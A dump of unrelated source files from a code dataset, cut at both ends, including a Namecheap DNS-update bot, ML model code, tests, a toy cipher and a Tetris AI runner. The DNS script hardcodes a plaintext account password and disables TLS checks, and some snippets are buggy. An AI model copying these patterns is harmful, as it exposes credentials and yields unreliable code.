otherwise.\n '''\n try:\n r = requests.get(self.url, timeout=2, verify=False)\n if r.status_code == 200:\n return True \n except ConnectionError as e:\n logging.warning(str(e))\n return False\n\n\nclass NameCheap(Domain):\n '''Class for domains registered with NameCheap.com\n \n Args:\n password (str): Password to namecheap account.\n username (str): Username to namecheap account.\n\n Attributes:\n instances (list): Contains every instance of this class.\n\n '''\n instances = []\n password = 'MyDomainPass614'\n username = 'andrewrowden'\n url = \"https://www.namecheap.com/myaccount/login.aspx?ReturnUrl=%2f\"\n def __init__(self, domain, https=False):\n\n super(NameCheap, self).__init__(domain, https)\n self.__class__.instances.append(weakref.proxy(self))\n\n\ndef update_dns(new_ip):\n '''Updates the IP address for every instance of the NameCheap class.\n Args:\n new_ip (str): The new IP address dns should resolve to.\n '''\n with Browser(NameCheap.url) as web:\n url = NameCheap.url\n web.driver.get(url)\n sleep(15)\n userName = web.driver.find_element_by_class_name('nc_username')\n userName.send_keys(NameCheap.username)\n passWord = web.driver.find_element_by_class_name('nc_password')\n passWord.send_keys(NameCheap.password)\n web.driver.find_element_by_css_selector(\"input[type='submit']\").click()\n sleep(15)\n for obj in NameCheap.instances:\n url = 'https://ap.www.namecheap.com/Domains/DomainControlPanel/%s/advancedns' % obj.domain\n web.driver.get(url)\n sleep(25)\n possibleLinks = web.driver.find_elements_by_css_selector('p')\n IPLink = find_IP_link(possibleLinks)\n IPLink.click()\n sleep(15)\n inputArea = web.driver.find_element_by_name('idAddress')\n inputArea.clear()\n inputArea.send_keys(new_ip)\n web.driver.find_element_by_class_name('save').click()\n\n\ndef find_IP_link(possible_links):\n '''Searches objects to find one with an IP address.\n Args:\n possible_links (webdriver objects): A list of objects with a text attribute.\n Returns:\n (webdriver object): Contains an IP address.\n '''\n isIP = re.compile(\"^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$\")\n for input_box in possible_links:\n value = input_box.text\n IP = isIP.match(value)\n if IP:\n return input_box\n","sub_path":"dynamicIP.py","file_name":"dynamicIP.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"239855558","text":"evens1 = [2, 1, 2, 3, 4]\r\nevens2 = [2, 2, 0]\r\nevens3 = [1, 3, 5]\r\nfor num in evens1:\r\n if num % 2 == 0:\r\n count_even1 =+1\r\n else:\r\n print()\r\n\r\nfor num in evens2:\r\n if num % 2 == 0:\r\n count_even2 +=1\r\n else:\r\n print()\r\n\r\nfor num in evens3:\r\n if num % 2 == 0:\r\n count_even3 +=1\r\n else:\r\n print()\r\n\r\n\r\nprint(\"Even numbers in the list\", count_even1)\r\nprint(\"Even numbers in the list\", count_even2)\r\nprint(\"Even numbers in the list\", count_even3)","sub_path":"Yeet/Archive/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"41702258","text":"import tensorflow as tf\n\nfrom utility.tf_utils import assert_rank\nfrom core.module import Ensemble\nfrom nn.func import Encoder, rnn\nfrom algo.iqn.nn import Quantile, Value\n\n\nclass RDQN(Ensemble):\n def __init__(self, config, env, **kwargs):\n super().__init__(\n model_fn=create_components, \n config=config,\n env=env,\n **kwargs)\n \n @tf.function\n def action(self, x, state, mask,\n prev_action=None, prev_reward=None,\n evaluation=False, epsilon=0,\n temp=1, return_stats=False,\n return_eval_stats=False):\n assert x.shape.ndims in (2, 4), x.shape\n\n x, state = self._encode(\n x, state, mask, prev_action, prev_reward)\n _, qt_embed = self.quantile(x)\n action = self.q.action(x, qt_embed, \n epsilon=epsilon, temp=temp, return_stats=return_stats)\n\n if evaluation:\n return tf.squeeze(action), state\n else:\n terms = {}\n action = tf.nest.map_structure(lambda x: tf.squeeze(x), action)\n if return_stats:\n action, terms = action\n terms.update({\n 'mu': self.q.compute_prob()\n })\n out = tf.nest.map_structure(lambda x: tf.squeeze(x), (action, terms))\n return out, state\n\n def _encode(self, x, state, mask, prev_action=None, prev_reward=None):\n x = tf.expand_dims(x, 1)\n mask = tf.expand_dims(mask, 1)\n x = self.encoder(x)\n if hasattr(self, 'rnn'):\n additional_rnn_input = self._process_additional_input(\n x, prev_action, prev_reward)\n x, state = self.rnn(x, state, mask, \n additional_input=additional_rnn_input)\n else:\n state = None\n x = tf.squeeze(x, 1)\n return x, state\n\n def _process_additional_input(self, x, prev_action, prev_reward):\n results = []\n if prev_action is not None:\n prev_action = tf.reshape(prev_action, (-1, 1))\n prev_action = tf.one_hot(prev_action, self.actor.action_dim, dtype=x.dtype)\n results.append(prev_action)\n if prev_reward is not None:\n prev_reward = tf.reshape(prev_reward, (-1, 1, 1))\n results.append(prev_reward)\n assert_rank(results, 3)\n return results\n\n def reset_states(self, states=None):\n if hasattr(self, 'rnn'):\n self.rnn.reset_states(states)\n\n def get_initial_state(self, inputs=None, batch_size=None, dtype=None):\n return self.rnn.get_initial_state(\n inputs, batch_size=batch_size, dtype=dtype) \\\n if hasattr(self, 'rnn') else None\n\n @property\n def state_size(self):\n return self.rnn.state_size if hasattr(self, 'rnn') else None\n \n @property\n def state_keys(self):\n return self.rnn.state_keys if hasattr(self, 'rnn') else ()\n\ndef create_components(config, env):\n action_dim = env.action_dim\n encoder_config = config['encoder']\n quantile_config = config['quantile']\n q_config = config['q']\n\n encoder_config['time_distributed'] = True\n model = dict(\n encoder=Encoder(encoder_config, name='encoder'),\n quantile=Quantile(quantile_config, name='phi'),\n q=Value(q_config, action_dim, name='q'),\n target_encoder=Encoder(encoder_config, name='target_encoder'),\n target_quantile=Quantile(quantile_config, name='target_phi'),\n target_q=Value(q_config, action_dim, name='target_q'),\n )\n if config.get('rnn'):\n rnn_config = config['rnn']\n model.update({\n 'rnn': rnn(rnn_config, name='rnn'),\n 'target_rnn': rnn(rnn_config, name='target_rnn')\n })\n\n return model\n\ndef create_model(config, env, **kwargs):\n return RDQN(config, env, **kwargs)\n","sub_path":"algo2/mriqn/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"91699659","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\n\"\"\" This module contains tests for aea/aea_builder.py \"\"\"\nimport os\nimport re\nfrom pathlib import Path\n\nimport pytest\n\nfrom aea.aea_builder import AEABuilder\nfrom aea.configurations.base import ComponentType\nfrom aea.crypto.fetchai import FetchAICrypto\nfrom aea.exceptions import AEAException\n\nfrom .conftest import CUR_PATH, ROOT_DIR, skip_test_windows\n\n\nFETCHAI = FetchAICrypto.identifier\n\n\n@skip_test_windows\ndef test_default_timeout_for_agent():\n \"\"\"\n Tests agents loop sleep timeout\n set by AEABuilder.DEFAULT_AGENT_LOOP_TIMEOUT\n \"\"\"\n agent_name = \"MyAgent\"\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n builder = AEABuilder()\n builder.set_name(agent_name)\n builder.add_private_key(FETCHAI, private_key_path)\n\n aea = builder.build()\n assert aea._timeout == builder.DEFAULT_AGENT_LOOP_TIMEOUT\n\n builder = AEABuilder()\n builder.set_name(agent_name)\n builder.add_private_key(FETCHAI, private_key_path)\n builder.set_timeout(100)\n\n aea = builder.build()\n assert aea._timeout == 100\n\n\ndef test_add_package_already_existing():\n \"\"\"\n Test the case when we try to add a package (already added) to the AEA builder.\n\n It should fail because the package is already present into the builder.\n \"\"\"\n builder = AEABuilder()\n fipa_package_path = Path(ROOT_DIR) / \"packages\" / \"fetchai\" / \"protocols\" / \"fipa\"\n builder.add_component(ComponentType.PROTOCOL, fipa_package_path)\n\n expected_message = re.escape(\n \"Component 'fetchai/fipa:0.2.0' of type 'protocol' already added.\"\n )\n with pytest.raises(AEAException, match=expected_message):\n builder.add_component(ComponentType.PROTOCOL, fipa_package_path)\n\n\ndef test_when_package_has_missing_dependency():\n \"\"\"\n Test the case when the builder tries to load the packages,\n but fails because of a missing dependency.\n \"\"\"\n builder = AEABuilder()\n expected_message = re.escape(\n \"Package 'fetchai/oef:0.3.0' of type 'connection' cannot be added. \"\n \"Missing dependencies: ['(protocol, fetchai/fipa:0.2.0)', '(protocol, fetchai/oef_search:0.1.0)']\"\n )\n with pytest.raises(AEAException, match=expected_message):\n # connection \"fetchai/oef:0.1.0\" requires\n # \"fetchai/oef_search:0.1.0\" and \"fetchai/fipa:0.2.0\" protocols.\n builder.add_component(\n ComponentType.CONNECTION,\n Path(ROOT_DIR) / \"packages\" / \"fetchai\" / \"connections\" / \"oef\",\n )\n","sub_path":"tests/test_aea_builder.py","file_name":"test_aea_builder.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"352328780","text":"\"\"\"\r\nModel coordinates and orientation\r\n\"\"\"\r\nimport math\r\n\r\nfrom Matrix import *\r\nfrom Vector import Vector3\r\n\r\nclass Coordinate:\r\n def __init__(self, rotation = Matrix3.identity(), translation = Vector3()):\r\n if isinstance(rotation, list):\r\n rotation = Matrix3(rotation)\r\n if isinstance(translation, list):\r\n translation = Vector3(translation[0], translation[1], translation[2])\r\n self.rotation = rotation\r\n self.translation = translation\r\n\r\n def matrix(self):\r\n return Matrix4([\\\r\n self.rotation[0][0], self.rotation[0][1], self.rotation[0][2], self.translation[0],\\\r\n self.rotation[1][0], self.rotation[1][1], self.rotation[1][2], self.translation[1],\\\r\n self.rotation[2][0], self.rotation[2][1], self.rotation[2][2], self.translation[2],\\\r\n 0, 0, 0, 1])\r\n\r\n def inverseMatrix(self):\r\n rotInv = self.rotation.transpose()\r\n trans = rotInv * (-self.translation)\r\n return Matrix4([\\\r\n rotInv[0][0], rotInv[0][1], rotInv[0][2], trans[0],\\\r\n rotInv[1][0], rotInv[1][1], rotInv[1][2], trans[1],\\\r\n rotInv[2][0], rotInv[2][1], rotInv[2][2], trans[2],\\\r\n 0, 0, 0, 1])\r\n\r\n def _computeWS(self, vector):\r\n v1 = self.rotation * vector\r\n v2 = v1 + self.translation\r\n return Vector3(v2.x, v2.y, v2.z)\r\n \r\n def toWorldSpace(self, vectors):\r\n if isinstance(vectors, list):\r\n for vector in vectors:\r\n if isinstance(vector, Vector.Vector3):\r\n self._computeWS(vector)\r\n elif isinstance(vectors, Vector.Vector3):\r\n self._computeWS(vectors)\r\n else:\r\n raise TypeError(\"not a supported type\")\r\n\r\n def _computeOS(self, vector):\r\n v1 = vector - self.translation\r\n v2 = self.rotation * v1\r\n return Vector3(v2.x, v2.y, v2.z)\r\n\r\n def toObjectSpace(self, vectors):\r\n if isinstance(vectors, list):\r\n for vector in vectors:\r\n if isinstance(vector, Vector.Vector3):\r\n self._computeOS(vector)\r\n elif isinstance(vectors, Vector.Vector3):\r\n self._computeOS(vectors)\r\n else:\r\n raise TypeError(\"not a supported type\")\r\n","sub_path":"branches/adaptare/trunk/hfall/Coordinate.py","file_name":"Coordinate.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"378761414","text":"from __future__ import absolute_import\nimport numpy\nfrom n2 import HnswIndex\nfrom ann_benchmarks.algorithms.base import BaseANN\n\nclass N2(BaseANN):\n def __init__(self, m):\n threads = 8\n self.name = 'N2(m={}, threads={})'.format(m,threads)\n self._m = m\n self._threads = threads\n self._index = None\n print(\"Init done\")\n\n def fit(self, X):\n X = numpy.array(X)\t\n X = X.astype(numpy.float32)\n self._index = HnswIndex(X.shape[1],\"L2\")\n print(\"Shape\", X.shape[1])\n for el in X:\n self._index.add_data(el) \n self._index.build(m=self._m, n_threads=self._threads)\n print(\"Fit done\")\n\n def query(self, v, n):\n v = v.astype(numpy.float32)\n #print(v)\n #print(n)\n #print(\"-----------------------------------\")\n nns = self._index.search_by_vector(v,n)\n #print(\"[search_by_vector]: Nearest neighborhoods of vector {}: {}\".format(v, nns))\n return nns\n def use_threads(self):\n return False\n \n","sub_path":"ann_benchmarks/algorithms/n2.py","file_name":"n2.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"131558789","text":"from settings import SETTINGS\nimport uuid\n\ndef validate(S, varnames, GLOBAL):\n for name in varnames:\n val = S(name)\n if isinstance(val,str) and val.startswith(\"as \"):\n val = val[3:]\n newval = eval(val)\n S(name,set=newval)\n\n if S(\"activation.type\") != \"timerelu\" and S(\"activation.type\") != \"trsim\":\n if \"timerelu\" in SETTINGS:\n del SETTINGS[\"timerelu\"]\n\n dir = S(\"log.dir\")\n dirthis = dir.endswith(\"!\")\n print(dir, dirthis)\n if dirthis:\n dir = dir[:-1]\n if not dirthis and not S(\"debug\"):\n S(\"log.dir\",set=dir+\"_\"+str(uuid.uuid4()).split(\"-\")[0])\n else:\n S(\"log.dir\",set=dir)\n\n if isinstance(S(\"util.variable.transformation\"),str):\n transformation_template = S(\"util.variable.transformation\")\n S(\"util.variable.transformation\",set=S(\"util.variable.transformation_templates.\"+transformation_template))\n S(\"util.variable.transformation.template_name\",set=transformation_template)\n\n if \"transformation_templates\" in SETTINGS[\"util\"][\"variable\"]:\n GLOBAL[\"transformation_templates\"] = SETTINGS[\"util\"][\"variable\"][\"transformation_templates\"]\n del SETTINGS[\"util\"][\"variable\"][\"transformation_templates\"]\n\n if S(\"pruning.activate\") and S(\"util.tfl\") == \"tfl\":\n raise ValueError(\"Pruning is only possible for setting: util.variable.tfl == 'tfl_custom'\")\n\n if S(\"predict_patches\"):\n if S(\"batches.patches_size\") == 0:\n raise ValueError(\"For patch-prediction you need to specify patches. (batches.patches_size> 0)\")\n if S(\"batches.test_like_train\") == 0:\n raise ValueError(\"For patch-prediction you need use batches.test_like_train-mode\")\n","sub_path":"settings_validator.py","file_name":"settings_validator.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"594234472","text":"import random\n\ndef shiftBy(c, n):\n return chr(((ord(c) - ord('a') + n) % 26) + ord('a'))\n\ndef encode(raw, keyLength):\n key = [random.randint(1,25) for i in range(keyLength)]\n secret = \"\".join([shiftBy(raw[i], key[i % keyLength]) for i in range(len(raw))])\n withSpaces = ''\n for i in range(len(secret)):\n if i % 5 == 4:\n withSpaces = withSpaces + secret[i] + ' '\n else:\n withSpaces = withSpaces + secret[i]\n return withSpaces, key\n\nx = 0\nwhile x < 25: \n code,key = encode(\"hvwgw gqozz srobv wghcf wqozq wdvsf psqoi gswhw gpfcy sbhbl\", 3)\n print(code, key)\n x += 1","sub_path":"2021/Code/Python/UDEL/AppliedCrypto/poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"365406354","text":"import argparse\nimport os\nfrom collections import OrderedDict\nimport sys\nimport time\n\nfrom aws_requests_auth.boto_utils import BotoAWSRequestsAuth\nimport requests\n\nparser = argparse.ArgumentParser(\n description=\"Helper script to upload files to S3 bucket\")\nparser.add_argument(\"--path\", type=str)\nparser.add_argument(\"--destination\", type=str)\nargs = parser.parse_args()\n\nassert os.path.exists(args.path)\nassert args.destination in {\"wheels\", \"containers\", \"logs\"}\nassert \"BUILDKITE_JOB_ID\" in os.environ\nassert \"BUILDKITE_COMMIT\" in os.environ\n\nis_dir = os.path.isdir(args.path)\n\nauth = BotoAWSRequestsAuth(\n aws_host=\"vop4ss7n22.execute-api.us-west-2.amazonaws.com\",\n aws_region=\"us-west-2\",\n aws_service=\"execute-api\",\n)\n\nfor _ in range(5):\n resp = requests.get(\n \"https://vop4ss7n22.execute-api.us-west-2.amazonaws.com/endpoint/\",\n auth=auth,\n params={\"job_id\": os.environ[\"BUILDKITE_JOB_ID\"]})\n print(\"Getting Presigned URL, status_code\", resp.status_code)\n if resp.status_code >= 500:\n print(\"errored, retrying...\")\n print(resp.text)\n time.sleep(5)\n else:\n break\nif resp.status_code >= 500:\n print(\"still errorred after many retries\")\n sys.exit(1)\n\nsha = os.environ[\"BUILDKITE_COMMIT\"]\nif is_dir:\n paths = [os.path.join(args.path, f) for f in os.listdir(args.path)]\nelse:\n paths = [args.path]\nprint(\"Planning to upload\", paths)\n\nfor path in paths:\n fn = os.path.split(path)[-1]\n if args.destination == \"wheels\":\n c = resp.json()[\"presigned_wheels\"]\n of = OrderedDict(c[\"fields\"])\n of[\"key\"] = f\"scratch/bk/{sha}/{fn}\"\n\n elif args.destination == \"containers\":\n c = resp.json()[\"presigned_containers\"]\n of = OrderedDict(c[\"fields\"])\n of[\"key\"] = f\"{sha}/{fn}\"\n\n elif args.destination == \"logs\":\n c = resp.json()[\"presigned_logs\"]\n of = OrderedDict(c[\"fields\"])\n branch = os.environ[\"BUILDKITE_BRANCH\"]\n bk_job_id = os.environ[\"BUILDKITE_JOB_ID\"]\n of[\"key\"] = f\"bazel_events/{branch}/{sha}/{bk_job_id}/{fn}\"\n\n else:\n raise ValueError(\"Unknown destination\")\n\n of[\"file\"] = open(path, \"rb\")\n r = requests.post(c[\"url\"], files=of)\n print(f\"Uploaded {path} to {of['key']}\", r.status_code)\n","sub_path":".buildkite/copy_files.py","file_name":"copy_files.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"60226081","text":"#!/usr/bin/env python\n\"\"\"\nCopyright 2012 Wordnik, Inc.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nclass TargetEmailRequest:\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\"\"\"\n\n\n def __init__(self):\n self.swaggerTypes = {\n 'dataFields': 'Map[string, object]',\n 'campaignId': 'long',\n 'inlineCss': 'bool',\n 'attachments': 'list[AttachmentEntry]',\n 'recipientEmail': 'str'\n\n }\n\n\n #Fields to merge into email template\n self.dataFields = None # Map[string, object]\n self.campaignId = None # long\n #Inline css to ensure proper rendering on gmail & outlook clients\n self.inlineCss = None # bool\n #Total attachment size limited to 10MB\n self.attachments = None # list[AttachmentEntry]\n self.recipientEmail = None # str\n \n","sub_path":"generated-code/client/iterable/python/models/TargetEmailRequest.py","file_name":"TargetEmailRequest.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"58505699","text":"#!/usr/bin/env python\n\nimport argparse\n\nparser = argparse.ArgumentParser(\"Program to display the velocity of the Janus nanomotor.\")\nparser.add_argument('file', type=str, help='H5MD datafile')\nparser.add_argument('--directed', action='store_true')\nparser.add_argument('--histogram', action='store_true')\nargs = parser.parse_args()\n\nimport numpy as np\nimport h5py\nimport matplotlib.pyplot as plt\n\nwith h5py.File(args.file, 'r') as f:\n r = f['particles/janus/position/value'][...]\n r_dt = f['particles/janus/position/time'][()]\n im = f['particles/janus/image/value'][...]\n v = f['particles/janus/velocity/value'][...]\n v_dt = f['particles/janus/velocity/time'][()]\n edges = f['particles/janus/box/edges'][:].reshape((1,-1))\n\nr += edges*im\n\nassert abs(r_dt-v_dt) < 1e-12\nassert r.shape[1]==36\nassert r.shape[2]==3\nassert v.shape[1]==36\nassert v.shape[2]==3\n\ntime = np.arange(r.shape[0])*r_dt\n\nv_com = v.mean(axis=1)\n\nif args.directed:\n unit_z = r[:,:18,:].mean(axis=1)-r[:,18:,:].mean(axis=1)\n unit_z /= np.sqrt(np.sum(unit_z**2, axis=1)).reshape((-1,1))\n vz = np.sum(v_com*unit_z, axis=1)\n if args.histogram:\n plt.hist(vz, bins=20)\n else:\n plt.plot(time, vz)\nelse:\n for i in range(3):\n plt.subplot(3,1,i+1)\n if args.histogram:\n plt.hist(v_com[:,i]) \n plt.ylabel(r'$P(v_'+'xyz'[i]+')$')\n else:\n plt.plot(time, v_com[:,i])\n plt.ylabel('xyz'[i])\n\nplt.show()\n","sub_path":"experiments/03-single-janus/plot_velocity.py","file_name":"plot_velocity.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"389172689","text":"import pygame\nfrom core.entities import Tetris\n\nimport os\nimport pickle\nimport neat\n\nfrom core.utilities import try_possible_moves\n\nclass VsAIRunner:\n\tdef __init__(self, width=10, height=20, debug_mode=False, cell_size=50):\n\t\tself.width = width\n\t\tself.height = height\n\t\tself.cell_size = cell_size\n\t\tself.debug_mode = debug_mode\n\t\tself.humanPlayer = Tetris(self.width, self.height, debug_mode=debug_mode)\n\t\tself.aiPlayer = Tetris(self.width, self.height, debug_mode=debug_mode)\n\t\tpygame.init()\n\t\tpygame.display.set_caption('Open Tetris')\n\t\tself.clock = pygame.time.Clock()\n\t\tself.screen = pygame.display.set_mode([(2 * width + 1) * self.cell_size, (height + 3) * self.cell_size])\n\t\tself.tick = 0\n\t\tself.ai_tick = 0\n\n\t\t# open the winner genome file\n\t\twith open(\"./single_player/winner.pickle\", 'rb') as genome_file:\n\t\t\t# load the winner genome to the genome variable\n\t\t\tgenome = pickle.load(genome_file)\n\n\t\t# name of directory containing this file\n\t\tlocal_dir = os.path.dirname(__file__)\n\t\t# path to the config file\n\t\tconfig_path = './single_player/config.txt'\n\t\t# extract details from the config file\n\t\tconfig = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction,\n\t\t neat.DefaultSpeciesSet, neat.DefaultStagnation,\n\t\t config_path)\n\t\t# model corresponding to the winning genome\n\t\tself.model = neat.nn.FeedForwardNetwork.create(genome, config)\n\n\tdef new_game(self):\n\t\tself.humanPlayer = Tetris(self.width, self.height, debug_mode=self.debug_mode)\n\t\tself.aiPlayer = Tetris(self.width, self.height, debug_mode=self.debug_mode)\n\t\tself.tick = 0\n\t\tself.ai_tick = 0\n\t\tself.erase_board()\n\n\tdef erase_board(self):\n\t\tself.screen.fill((0, 0, 0))\n\n\tdef draw_grid(self, xOffset):\n\t\tfor i in range(self.width-1):\n\t\t\tpygame.draw.rect(self.screen, (100,100,100), pygame.Rect(i * self.cell_size + self.cell_size - 2 + xOffset, 3*self.cell_size, 4, (self.height+3)*self.cell_size))\n\t\tfor i in range(self.height+2):\n\t\t\tif i > 1:\n\t\t\t\tpygame.draw.rect(self.screen, (100,100,100), pygame.Rect(xOffset, i * self.cell_size + self.cell_size - 2, self.width*self.cell_size, 4))\n\n\tdef display_board(self, p1Name=\"Human\"):\n\t\tp1_data = self.humanPlayer.get_board()\n\t\tp2_data = self.aiPlayer.get_board()\n\n\t\tfor y in range(len(p1_data)):\n\t\t\tfor x in range(len(p1_data[y])):\n\t\t\t\tcell = p1_data[y][x]\n\t\t\t\tpygame.draw.rect(self.screen, cell, pygame.Rect(x * self.cell_size, (self.height - y + 2) * self.cell_size, self.cell_size, self.cell_size))\n\n\t\tfor y in range(len(p2_data)):\n\t\t\tfor x in range(len(p2_data[y])):\n\t\t\t\tcell = p2_data[y][x]\n\t\t\t\tpygame.draw.rect(self.screen, cell, pygame.Rect(x * self.cell_size + self.width * self.cell_size + self.cell_size, (self.height - y + 2) * self.cell_size, self.cell_size, self.cell_size))\n\n\t\tpygame.draw.rect(self.screen, (150, 150, 150), pygame.Rect(self.width * self.cell_size, 0, self.cell_size, self.cell_size * (self.height+3)))\n\t\tself.draw_grid(0)\n\t\tself.draw_grid(self.width * self.cell_size + self.cell_size)\n\n\t\tpygame.display.flip()\n\n\t\tpygame.display.set_caption(\"Open Tetris | \" + p1Name + \" Score: \" + str(self.humanPlayer.get_score()) + \", \"\n\t\t + str(self.humanPlayer.board.get_lines_cleared()) + \" lines cleared | SP AI Score: \"\n\t\t + str(self.aiPlayer.get_score()) + \", \"\n\t\t + str(self.aiPlayer.board.get_lines_cleared())\n\t\t + \" lines cleared\")\n\n\tdef display_winner(self, p1Name=\"Human\"):\n\t\tannouncement = p1Name + \" Wins!\"\n\t\tif self.aiPlayer.get_score() > self.humanPlayer.get_score():\n\t\t\tannouncement = \"AI Wins!\"\n\t\tprint(announcement)\n\t\tpygame.display.set_caption(announcement\n\t\t\t\t\t\t\t\t\t+ \" | Open Tetris | \" + p1Name + \" Score: \" + str(self.humanPlayer.get_score()) + \", \"\n\t\t + str(self.humanPlayer.board.get_lines_cleared()) + \" lines cleared | SP AI Score: \"\n\t\t + str(self.aiPlayer.get_score()) + \", \"\n\t\t + str(self.aiPlayer.board.get_lines_cleared())\n\t\t + \" lines cleared\")\n\n\tdef wait_for_input(self):\n\t\ttick = 0\n\t\twhile tick < 160:\n\t\t\ttick += 1\n\t\t\tself.clock.tick(40)\n\n\t\tfor event in pygame.event.get():\n\t\t\tpass\n\t\tevents = 0\n\t\twhile events == 0:\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tevents += 1\n\t\t\tself.clock.tick(40)\n\n\tdef ai_choose_move(self):\n\t\tpossible_moves_result = try_possible_moves(self.aiPlayer, self.model)\n\t\t# if list is not empty\n\t\tif possible_moves_result:\n\t\t\t# best moves correspond to 0th position because of descending sort\n\t\t\tself.aiPlayer.goalRotation, self.aiPlayer.goalX, _ = possible_moves_result[0]\n\t\t\treturn True\n\t\treturn False\n\n\tdef ai_move(self):\n\t\tif not self.aiPlayer.is_failed():\n\t\t\tif self.aiPlayer.goalRotation is None:\n\t\t\t\tself.ai_choose_move()\n\t\t\tif self.aiPlayer.piece.shape != self.aiPlayer.goalRotation.shape:\n\t\t\t\tsuccess = self.aiPlayer.rotate_piece()\n\t\t\t\tif not success:\n\t\t\t\t\tself.ai_choose_move()\n\t\t\telif self.aiPlayer.goalX != self.aiPlayer.piece.center[0]:\n\t\t\t\tif self.aiPlayer.goalX > self.aiPlayer.piece.center[0]:\n\t\t\t\t\tsuccess = self.aiPlayer.move_piece(\"right\")\n\t\t\t\telse:\n\t\t\t\t\tsuccess = self.aiPlayer.move_piece(\"left\")\n\t\t\t\tif not success:\n\t\t\t\t\tself.ai_choose_move()\n\t\t\telse:\n\t\t\t\tself.aiPlayer.snap_piece()\n\t\t\t\tself.aiPlayer.goalRotation = None\n\t\t\t\tself.aiPlayer.goalX = None\n\n\tdef get_input(self):\n\t\thumanMove = False\n\t\tp1_total_lines_cleared = self.humanPlayer.board.lines_cleared\n\t\tp2_total_lines_cleared = self.aiPlayer.board.lines_cleared\n\n\t\tif not self.humanPlayer.is_failed():\n\t\t\t#Get event inputs (keydowns)\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tpygame.quit()\n\t\t\t\t\texit()\n\t\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key == pygame.K_a:\n\t\t\t\t\t\thumanMove = self.humanPlayer.move_piece('left')\n\t\t\t\t\t\tself.tick = 0\n\t\t\t\t\telif event.key == pygame.K_w:\n\t\t\t\t\t\tself.tick = 0\n\t\t\t\t\t\thumanMove = self.humanPlayer.snap_piece()\n\t\t\t\t\telif event.key == pygame.K_s:\n\t\t\t\t\t\tself.tick = 0\n\t\t\t\t\t\thumanMove = self.humanPlayer.move_piece('down')\n\t\t\t\t\telif event.key == pygame.K_d:\n\t\t\t\t\t\tself.tick = 0\n\t\t\t\t\t\thumanMove = self.humanPlayer.move_piece('right')\n\t\t\t\t\telif event.key == pygame.K_r:\n\t\t\t\t\t\tself.tick = 0\n\t\t\t\t\t\thumanMove = self.humanPlayer.rotate_piece()\n\n\t\t\tself.tick = self.tick + 1\n\n\t\t\t#Player 1 ticks\n\t\t\tif self.tick > 5:\n\t\t\t\tkeys = pygame.key.get_pressed()\n\t\t\t\tif keys[pygame.K_a]:\n\t\t\t\t\thumanMove = self.humanPlayer.move_piece('left')\n\t\t\t\t\tself.tick = 0\n\t\t\t\telif keys[pygame.K_d]:\n\t\t\t\t\thumanMove = self.humanPlayer.move_piece('right')\n\t\t\t\t\tself.tick = 0\n\t\t\t\telif keys[pygame.K_s]:\n\t\t\t\t\thumanMove = self.humanPlayer.move_piece('down')\n\t\t\t\t\tself.tick = 0\n\t\t\tif self.tick > 45:\n\t\t\t\thumanMove = self.humanPlayer.move_piece('down')\n\t\t\t\tself.tick = 0\n\n\t\tif not self.aiPlayer.is_failed():\n\t\t\tself.ai_tick += 1\n\t\t\tif self.ai_tick > 20:\n\t\t\t\tself.ai_tick = 0\n\t\t\t\tself.ai_move()\n\n\t\tp1_line_clears = self.humanPlayer.board.lines_cleared - p1_total_lines_cleared\n\t\tp2_line_clears = self.aiPlayer.board.lines_cleared - p2_total_lines_cleared\n\n\t\tif not self.aiPlayer.is_failed():\n\t\t\tif p1_line_clears == 2:\n\t\t\t\tself.aiPlayer.add_opponent_lines(1)\n\t\t\telif p1_line_clears == 